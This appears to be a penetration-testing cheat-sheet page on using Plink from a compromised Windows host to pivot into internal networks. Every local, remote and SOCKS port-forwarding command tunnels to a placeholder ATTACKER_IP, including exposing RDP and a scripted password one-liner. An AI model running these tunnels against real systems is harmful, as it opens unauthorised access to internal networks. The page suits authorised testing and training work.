> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Plink

> Plink (PuTTY CLI) tunneling from Windows: local, remote, and dynamic port forwarding for pivoting.

## Overview

Plink is PuTTY's command-line SSH client. Useful for pivoting from Windows targets that don't have native SSH.

## Download

Pre-installed on many Windows systems with PuTTY. Otherwise:

```
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
```

Binary: `plink.exe`

***

## Local Port Forward

Access internal service from attacker via Windows pivot.

```cmd theme={"dark"}
plink.exe -L LOCAL_PORT:TARGET_IP:TARGET_PORT user@ATTACKER_IP
```

### Example

```cmd theme={"dark"}
plink.exe -L 8080:10.10.10.5:80 user@ATTACKER_IP
```

***

## Remote Port Forward

Expose Windows pivot's local service to attacker.

```cmd theme={"dark"}
plink.exe -R ATTACKER_PORT:127.0.0.1:LOCAL_PORT user@ATTACKER_IP
```

### Example — Expose RDP

```cmd theme={"dark"}
plink.exe -R 3390:127.0.0.1:3389 kali@ATTACKER_IP
```

Attacker accesses `localhost:3390` → Windows pivot RDP.

***

## Dynamic Port Forward (SOCKS)

```cmd theme={"dark"}
plink.exe -D 1080 user@ATTACKER_IP
```

***

## Non-Interactive (Scripted)

Accept host key automatically and provide password via echo:

```cmd theme={"dark"}
echo y | plink.exe -R 3390:127.0.0.1:3389 -l kali -pw password ATTACKER_IP
```

<Warning>Password visible in process list. Use SSH keys when possible.</Warning>

***

## With SSH Key

```cmd theme={"dark"}
plink.exe -i key.ppk -R 3390:127.0.0.1:3389 kali@ATTACKER_IP
```

Convert OpenSSH key to PPK with PuTTYgen if needed.

***

## Common Pivoting Scenario

```
Attacker (Kali) ← plink → Windows Pivot → Internal Network
```

```cmd theme={"dark"}
# On Windows pivot — expose internal web server to attacker
plink.exe -R 8080:10.10.10.5:80 kali@ATTACKER_IP -pw password
```

```bash theme={"dark"}
# On attacker — access internal web
curl http://127.0.0.1:8080
```

***

## Quick Reference

| Task            | Command                                          |
| --------------- | ------------------------------------------------ |
| Local forward   | `plink.exe -L PORT:TARGET:PORT user@IP`          |
| Remote forward  | `plink.exe -R PORT:127.0.0.1:PORT user@IP`       |
| SOCKS           | `plink.exe -D 1080 user@IP`                      |
| Non-interactive | `echo y \| plink.exe -R ... -l user -pw pass IP` |
